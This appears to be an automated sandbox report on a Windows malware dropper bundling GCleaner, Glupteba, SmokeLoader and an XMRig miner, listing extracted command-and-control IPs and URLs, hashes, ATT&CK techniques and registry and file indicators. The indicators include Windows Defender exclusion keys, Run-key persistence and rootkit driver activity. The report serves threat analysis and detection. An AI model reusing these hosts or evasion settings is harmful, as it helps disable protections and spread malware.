gcleaner | 1adda3b870c28e6ae33226565b2f31ebfed65adf7a530a883404021104714746

Analysis

max time kernel
149s
max time network
154s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
08-06-2023 02:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1adda3b870c28e6ae33226565b2f31ebfed65adf7a530.exe
Size

4.2MB
MD5

4179238c49a009468a87403bc51a3d48
SHA1

4ba7cab7aafd77a37a2352abe7216e8f30c588a5
SHA256

1adda3b870c28e6ae33226565b2f31ebfed65adf7a530a883404021104714746
SHA512

73328b77b3be07c082e15fbb9882e678ab757a31563ba4614a0d0ff5b362d503fac6588278b7d50f2383187d733cbc804b9700b6a26e4d345f07b65dbd73081b
SSDEEP

98304:295Xve/N7hR1j+Y5+5qBONF+Slju5IhZza8GzAZ2DIv9zMA4q3pGUOW3slcPcYJJ:+5XvOLl+Y5i4OuKjW4BJZVhMA4q3pGUP

Score

10^/10

gcleaner glupteba smokeloader xmrig up3 backdoor discovery dropper evasion loader miner persistence rootkit trojan upx

Malware Config

Extracted

Family

smokeloader

Botnet

up3

Extracted

Family

gcleaner

45.12.253.56

45.12.253.72

45.12.253.98

45.12.253.75

Extracted

Family

smokeloader

Version

2020

http://host-file-host6.com/

http://host-host-file8.com/

rc4.i32

Signatures

GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 12 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1344-149-0x00000000047E0000-0x00000000050CB000-memory.dmp	family_glupteba
behavioral1/memory/1344-161-0x0000000000400000-0x000000000295A000-memory.dmp	family_glupteba
behavioral1/memory/1192-171-0x0000000000400000-0x000000000295A000-memory.dmp	family_glupteba
behavioral1/memory/928-173-0x0000000004620000-0x0000000004F0B000-memory.dmp	family_glupteba
behavioral1/memory/928-214-0x0000000000400000-0x000000000295A000-memory.dmp	family_glupteba
behavioral1/memory/928-250-0x0000000000400000-0x000000000295A000-memory.dmp	family_glupteba
behavioral1/memory/928-282-0x0000000000400000-0x000000000295A000-memory.dmp	family_glupteba
behavioral1/memory/928-303-0x0000000000400000-0x000000000295A000-memory.dmp	family_glupteba
behavioral1/memory/928-306-0x0000000000400000-0x000000000295A000-memory.dmp	family_glupteba
behavioral1/memory/928-309-0x0000000000400000-0x000000000295A000-memory.dmp	family_glupteba
behavioral1/memory/928-337-0x0000000000400000-0x000000000295A000-memory.dmp	family_glupteba
behavioral1/memory/928-342-0x0000000000400000-0x000000000295A000-memory.dmp	family_glupteba

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs

Processes:

XandETC.exeupdater.execonhost.exe

description	pid	process	target process
PID 1800 created 1204	1800	XandETC.exe	Explorer.EXE
PID 1800 created 1204	1800	XandETC.exe	Explorer.EXE
PID 1800 created 1204	1800	XandETC.exe	Explorer.EXE
PID 1800 created 1204	1800	XandETC.exe	Explorer.EXE
PID 1800 created 1204	1800	XandETC.exe	Explorer.EXE
PID 316 created 1204	316	updater.exe	Explorer.EXE
PID 316 created 1204	316	updater.exe	Explorer.EXE
PID 316 created 1204	316	updater.exe	Explorer.EXE
PID 316 created 1204	316	updater.exe	Explorer.EXE
PID 316 created 1204	316	updater.exe	Explorer.EXE
PID 1440 created 1204	1440	conhost.exe	Explorer.EXE
PID 316 created 1204	316	updater.exe	Explorer.EXE

Windows security bypass 2 TTPs 7 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

3eef203fb515bda85f514e168abb5973.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\3eef203fb515bda85f514e168abb5973.exe = "0"	3eef203fb515bda85f514e168abb5973.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	3eef203fb515bda85f514e168abb5973.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	3eef203fb515bda85f514e168abb5973.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	3eef203fb515bda85f514e168abb5973.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	3eef203fb515bda85f514e168abb5973.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	3eef203fb515bda85f514e168abb5973.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	3eef203fb515bda85f514e168abb5973.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Modifies boot configuration data using bcdedit 14 IoCs

Processes:

bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exe

pid	process
844	bcdedit.exe
808	bcdedit.exe
1264	bcdedit.exe
324	bcdedit.exe
520	bcdedit.exe
900	bcdedit.exe
2028	bcdedit.exe
1656	bcdedit.exe
752	bcdedit.exe
1664	bcdedit.exe
776	bcdedit.exe
1080	bcdedit.exe
1904	bcdedit.exe
1424	bcdedit.exe

XMRig Miner payload 6 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/428-338-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/428-348-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/428-349-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/428-351-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/428-354-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/428-356-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig

Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

csrss.exe

description ioc process

File created C:\Windows\system32\drivers\Winmon.sys csrss.exe
Modifies Windows Firewall 1 TTPs 1 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exe

pid process

340 netsh.exe
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
evasion

Impair Defenses
T1562

Command-Line Interface
T1059
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

description	ioc	process
File created	C:\Windows\system32\drivers\Winmon.sys	csrss.exe

pid	process
340	netsh.exe

Executes dropped EXE 19 IoCs

Processes:

aafg31.exeoldplayer.exeoneetx.exeXandETC.exetoolspub2.exetoolspub2.exe3eef203fb515bda85f514e168abb5973.exesetup.exe3eef203fb515bda85f514e168abb5973.execsrss.exepatch.exeinjector.exeupdater.exeoneetx.exedsefix.exewindefender.exewindefender.exef801950a962ddba14caaa44bf084b55c.exeoneetx.exe

pid	process
1092	aafg31.exe
1752	oldplayer.exe
292	oneetx.exe
1800	XandETC.exe
324	toolspub2.exe
1864	toolspub2.exe
1344	3eef203fb515bda85f514e168abb5973.exe
2004	setup.exe
1192	3eef203fb515bda85f514e168abb5973.exe
928	csrss.exe
1064	patch.exe
680	injector.exe
316	updater.exe
1800	oneetx.exe
1288	dsefix.exe
792	windefender.exe
1116	windefender.exe
1672	f801950a962ddba14caaa44bf084b55c.exe
1668	oneetx.exe

Loads dropped DLL 30 IoCs

Processes:

1adda3b870c28e6ae33226565b2f31ebfed65adf7a530.exeoldplayer.exeoneetx.exetoolspub2.exesetup.exe3eef203fb515bda85f514e168abb5973.exepatch.execsrss.exetaskeng.exe

pid	process
1236	1adda3b870c28e6ae33226565b2f31ebfed65adf7a530.exe
1236	1adda3b870c28e6ae33226565b2f31ebfed65adf7a530.exe
1236	1adda3b870c28e6ae33226565b2f31ebfed65adf7a530.exe
1752	oldplayer.exe
1236	1adda3b870c28e6ae33226565b2f31ebfed65adf7a530.exe
292	oneetx.exe
292	oneetx.exe
324	toolspub2.exe
292	oneetx.exe
292	oneetx.exe
292	oneetx.exe
2004	setup.exe
2004	setup.exe
2004	setup.exe
1192	3eef203fb515bda85f514e168abb5973.exe
1192	3eef203fb515bda85f514e168abb5973.exe
820
1064	patch.exe
1064	patch.exe
1064	patch.exe
1064	patch.exe
1064	patch.exe
928	csrss.exe
1064	patch.exe
1064	patch.exe
1064	patch.exe
1236	taskeng.exe
928	csrss.exe
928	csrss.exe
928	csrss.exe

UPX packed file 21 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Windows\windefender.exe	upx
C:\Windows\windefender.exe	upx
C:\Windows\windefender.exe	upx
behavioral1/memory/792-293-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/1116-301-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/792-302-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/1116-305-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/1116-319-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe	upx
\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe	upx
C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe	upx
\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe	upx
behavioral1/memory/428-338-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/1672-341-0x0000000000400000-0x0000000000C25000-memory.dmp	upx
behavioral1/memory/1116-343-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/1672-345-0x0000000000400000-0x0000000000C25000-memory.dmp	upx
behavioral1/memory/428-348-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/428-349-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/428-351-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/428-354-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/428-356-0x0000000140000000-0x00000001407F4000-memory.dmp	upx

Windows security modification 2 TTPs 7 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

3eef203fb515bda85f514e168abb5973.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	3eef203fb515bda85f514e168abb5973.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	3eef203fb515bda85f514e168abb5973.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	3eef203fb515bda85f514e168abb5973.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\3eef203fb515bda85f514e168abb5973.exe = "0"	3eef203fb515bda85f514e168abb5973.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	3eef203fb515bda85f514e168abb5973.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	3eef203fb515bda85f514e168abb5973.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	3eef203fb515bda85f514e168abb5973.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

3eef203fb515bda85f514e168abb5973.execsrss.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Manipulates WinMon driver. 1 IoCs
Roottkits write to WinMon to hide PIDs from being detected.
rootkit evasion

Processes:

csrss.exe

description ioc process

File opened for modification \??\WinMon csrss.exe
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
rootkit evasion

Processes:

csrss.exe

description ioc process

File opened for modification \??\WinMonFS csrss.exe

description	ioc	process
File opened for modification	\??\WinMon	csrss.exe

description	ioc	process
File opened for modification	\??\WinMonFS	csrss.exe

Drops file in System32 directory 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

toolspub2.exeupdater.exe

description	pid	process	target process
PID 324 set thread context of 1864	324	toolspub2.exe	toolspub2.exe
PID 316 set thread context of 1440	316	updater.exe	conhost.exe
PID 316 set thread context of 428	316	updater.exe	conhost.exe

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery
T1082

Processes:

3eef203fb515bda85f514e168abb5973.exe

description ioc process

File opened (read-only) \??\VBoxMiniRdrDN 3eef203fb515bda85f514e168abb5973.exe

description	ioc	process
File opened (read-only)	\??\VBoxMiniRdrDN	3eef203fb515bda85f514e168abb5973.exe

Drops file in Program Files directory 4 IoCs

Processes:

XandETC.exeupdater.execmd.execmd.exe

description	ioc	process
File created	C:\Program Files\Notepad\Chrome\updater.exe	XandETC.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Drops file in Windows directory 5 IoCs

Processes:

3eef203fb515bda85f514e168abb5973.execsrss.exemakecab.exe

description	ioc	process
File created	C:\Windows\rss\csrss.exe	3eef203fb515bda85f514e168abb5973.exe
File created	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe
File created	C:\Windows\Logs\CBS\CbsPersist_20230608025730.cab	makecab.exe
File opened for modification	C:\Windows\rss	3eef203fb515bda85f514e168abb5973.exe

Launches sc.exe 11 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1180 sc.exe
2028 sc.exe
1264 sc.exe
1968 sc.exe
1292 sc.exe
1652 sc.exe
2040 sc.exe
864 sc.exe
1476 sc.exe
1808 sc.exe
1564 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
1180	sc.exe
2028	sc.exe
1264	sc.exe
1968	sc.exe
1292	sc.exe
1652	sc.exe
2040	sc.exe
864	sc.exe
1476	sc.exe
1808	sc.exe
1564	sc.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

toolspub2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe

Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1704 schtasks.exe
1912 schtasks.exe
1324 schtasks.exe
1924 schtasks.exe
572 schtasks.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

324 taskkill.exe

pid	process
1704	schtasks.exe
1912	schtasks.exe
1324	schtasks.exe
1924	schtasks.exe
572	schtasks.exe

pid	process
324	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

netsh.exewindefender.exe3eef203fb515bda85f514e168abb5973.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-242 = "Samoa Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-292 = "Central European Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-732 = "Fiji Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-731 = "Fiji Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-384 = "Namibia Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-212 = "Pacific Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-472 = "Ekaterinburg Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-271 = "Greenwich Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-692 = "Tasmania Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-752 = "Tonga Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-112 = "Eastern Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1021 = "Bangladesh Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-571 = "China Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-771 = "Montevideo Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-392 = "Arab Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1022 = "Bangladesh Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-435 = "Georgian Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-105 = "Central Brazilian Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-501 = "Nepal Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-871 = "Pakistan Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-721 = "Central Pacific Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-171 = "Central Daylight Time (Mexico)"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-352 = "FLE Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-462 = "Afghanistan Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-681 = "E. Australia Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-542 = "Myanmar Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-221 = "Alaskan Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-662 = "Cen. Australia Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-151 = "Central America Daylight Time"	windefender.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	3eef203fb515bda85f514e168abb5973.exe
